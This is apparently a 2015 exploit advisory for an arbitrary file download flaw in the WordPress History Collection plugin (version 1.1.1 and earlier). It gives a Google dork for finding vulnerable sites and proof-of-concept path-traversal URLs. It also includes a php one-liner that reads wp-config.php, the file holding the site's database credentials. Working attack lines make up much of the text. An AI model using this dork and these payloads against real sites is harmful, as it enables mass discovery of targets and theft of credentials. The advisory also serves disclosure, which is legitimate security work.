27 lines
No EOL
1.1 KiB
Text
27 lines
No EOL
1.1 KiB
Text
# Exploit Title: Wordpress History Collection <=1.1.1 Arbitraty File
|
|
Download
|
|
# Google Dork: inurl:plugins/history-collection
|
|
# Date: 10/06/2015
|
|
# Exploit Author: Kuroi'SH
|
|
# Software Link: https://wordpress.org/plugins/history-collection/
|
|
# Version: <=1.1.1
|
|
# Tested on: Linux
|
|
|
|
I-Description:
|
|
Wordpress history collection plugin contains a file called download.php
|
|
which is not filtering the GET input, it then uses this get input value to
|
|
force the download of a file.
|
|
(download.php, line 44):
|
|
header("Content-Disposition: attachment;
|
|
filename=\"".basename($filename)."\";" );
|
|
2:Proof of concept:
|
|
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
|
|
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
|
|
php -r "echo @file_get_contents('
|
|
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php')
|
|
;"
|
|
|
|
Greetz:
|
|
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
|
|
MuhmadEmad, redsm0ke
|
|
By Kuroi'SH |